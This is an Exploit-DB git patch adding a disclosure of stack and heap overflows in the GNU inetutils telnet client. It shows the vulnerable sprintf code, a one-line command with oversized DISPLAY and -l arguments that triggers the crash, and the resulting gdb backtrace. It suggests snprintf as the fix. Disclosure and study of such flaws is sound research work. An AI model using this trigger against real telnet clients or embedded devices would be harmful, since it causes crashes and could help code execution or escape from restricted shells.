From a9bfc525dd8f9294d52a32f7db933fee5fcce29b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 18 Dec 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-12-18 1 changes to exploits/shellcodes GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC) --- exploits/linux/dos/45982.txt | 102 +++++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 103 insertions(+) create mode 100644 exploits/linux/dos/45982.txt diff --git a/exploits/linux/dos/45982.txt b/exploits/linux/dos/45982.txt new file mode 100644 index 000000000..80d53df45 --- /dev/null +++ b/exploits/linux/dos/45982.txt @@ -0,0 +1,102 @@ +GNU inetutils <= 1.9.4 telnet.c multiple overflows +================================================== +GNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment +variable handling which can be exploited to escape restricted shells on embedded devices. +Most modern browsers no longer support telnet:// handlers, but in instances where URI +handlers are enabled to the inetutils telnet client this issue maybe remotely triggerable. +A stack-based overflow is present in the handling of environment variables when connecting +telnet.c to remote telnet servers through oversized DISPLAY arguments. + +A heap-overflow is also present which can be triggered in a different code path due to +supplying oversized environment variables during client connection code. + +The stack-based overflow can be seen in the following code snippet from the latest inetutils +release dated 2015. + +inetutils-telnet/inetutils-1.9.4/telnet/telnet.c + +983- case TELOPT_XDISPLOC: +984- if (my_want_state_is_wont (TELOPT_XDISPLOC)) +985- return; +986- if (SB_EOF ()) +987- return; +988- if (SB_GET () == TELQUAL_SEND) +989- { +990- unsigned char temp[50], *dp; +991- int len; +992- +993- if ((dp = env_getvalue ("DISPLAY")) == NULL) +994- { +995- /* +996- * Something happened, we no longer have a DISPLAY +997- * variable. So, turn off the option. +998- */ +999- send_wont (TELOPT_XDISPLOC, 1); +1000- break; +1001- } +1002: sprintf ((char *) temp, "%c%c%c%c%s%c%c", IAC, SB, TELOPT_XDISPLOC, +1003- TELQUAL_IS, dp, IAC, SE); +1004- len = strlen ((char *) temp + 4) + 4; /* temp[3] is 0 ... */ +1005- +1006- if (len < NETROOM ()) + +When a telnet server requests environment options the sprintf on line 1002 will +not perform bounds checking and causes an overflow of stack buffer temp[50] defined +at line 990. This issue can be trivially fixed using a patch to add bounds checking +to sprintf such as with a call to snprintf(); + +An example of the heap overflow can be seen when handling large environment +variables within the telnet client, causing heap buffer memory corruption +through long string supplied in example USER or DISPLAY. + +An example of triggering this issue on inetutils in Arch Linux can be seen below: + +DISPLAY=`perl -e 'print Ax"50000"'` telnet -l`perl -e 'print "A"x5000'` 192.168.69.1 +Trying 192.168.69.1... +Connected to 192.168.69.1. +Escape character is '^]'. +realloc(): invalid next size +Aborted (core dumped) + +These issues are present anywhere that inetutils is used as a base for clients +such as in common embedded home routers or networking equipment. An attacker +can potentially exploit these vulnerabilities to gain arbitrary code execution +on platforms where telnet commands are available. An example debug trace of the +heap overflow can be found below: + +(gdb) run -l`perl -e 'print "A"x5000'` 192.168.69.1 +Starting program: /usr/bin/telnet -l`perl -e 'print "A"x5000'` 192.168.69.1 +Trying 192.168.69.1... +Connected to 192.168.69.1. +Escape character is '^]'. +realloc(): invalid next size + +Program received signal SIGABRT, Aborted. +0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6 +(gdb) bt +#0 0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6 +#1 0x00007ffff7d72672 in abort () from /usr/lib/libc.so.6 +#2 0x00007ffff7dca878 in __libc_message () from /usr/lib/libc.so.6 +#3 0x00007ffff7dd118a in malloc_printerr () from /usr/lib/libc.so.6 +#4 0x00007ffff7dd52ac in _int_realloc () from /usr/lib/libc.so.6 +#5 0x00007ffff7dd62df in realloc () from /usr/lib/libc.so.6 +#6 0x000055555556029c in ?? () +#7 0x0000555555560116 in ?? () +#8 0x000055555556049f in ?? () +#9 0x00005555555606b7 in ?? () +#10 0x00005555555616de in ?? () +#11 0x0000555555561b8d in ?? () +#12 0x0000555555562122 in ?? () +#13 0x000055555555c6f4 in ?? () +#14 0x00005555555591e7 in ?? () +#15 0x00007ffff7d74223 in __libc_start_main () from /usr/lib/libc.so.6 +#16 0x00005555555592be in ?? () + +Due to the various devices embedding telnet from inetutils and distributions +such as Arch Linux using inetutils telnet, it is unclear the full impact and all +scenarios where this issue could be leveraged. An attacker may seek to exploit +these vulnerabilities to escape restricted shells. + +-- Hacker Fantastic (11/12/2018) + +https://hacker.house \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8bc6ca9b2..f52de96a6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6210,6 +6210,7 @@ id,file,description,date,author,type,platform,port 45956,exploits/windows_x86/dos/45956.py,"Textpad 8.1.2 - Denial Of Service (PoC)",2018-12-09,"Gionathan Reale",dos,windows_x86, 45966,exploits/windows/dos/45966.py,"SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)",2018-12-11,"Alejandra Sánchez",dos,windows, 45968,exploits/windows/dos/45968.py,"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)",2018-12-11,"Gionathan Reale",dos,windows, +45982,exploits/linux/dos/45982.txt,"GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)",2018-12-11,"Hacker Fantastic",dos,linux, 45983,exploits/linux/dos/45983.txt,"Linux - 'userfaultfd' Bypasses tmpfs File Permissions",2018-12-13,"Google Security Research",dos,linux, 45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple, 45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,